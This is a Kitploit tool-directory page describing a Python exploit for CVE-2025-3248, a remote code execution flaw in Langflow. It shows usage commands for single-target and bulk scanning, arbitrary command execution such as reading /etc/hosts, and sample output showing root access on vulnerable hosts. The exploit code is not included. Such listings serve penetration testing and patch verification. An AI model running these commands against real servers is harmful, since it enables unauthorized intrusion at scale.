Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-3248 | Kitploit
Tools/GitHubGitHub/imbas007/cve-2025-3248
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubimbas007/cve-2025-3248

CVE-2025-3248

View Repository
21 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Langflow CVE-2025-3248 Exploit

A Python-based exploit for CVE-2025-3248, which allows remote and unauthenticated attackers to execute arbitrary code on vulnerable Langflow instances through crafted HTTP requests.

Features

  • Single URL or bulk scanning from file
  • Automatic vulnerability detection
  • Command execution capability
  • Detailed output with timing information
  • Results saved to separate files for vulnerable and non-vulnerable targets
  • Benchmark statistics for scan performance

Usage

Single URL Scan

root@kitploit:~
python CVE-2025-3248.py http://target-url -c "cat /etc/hosts"

Bulk Scan from File

root@kitploit:~
python CVE-2025-3248.py -f targets.txt

Custom Command Execution

root@kitploit:~
python CVE-2025-3248.py -f targets.txt -c "whoami"

Example Output

root@kitploit:~
[*] Progress: 1/10 URLs checked
[*] Checking https://example.com
[+] Vulnerable - Command Output:
uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------

[*] Scan Summary:
[+] Total URLs checked: 10
[+] Vulnerable URLs: 3
[+] Not Vulnerable URLs: 7
[*] Total scan time: 25.34s
[*] Results saved to files with timestamp

source: https://github.com/verylazytech

Download Tool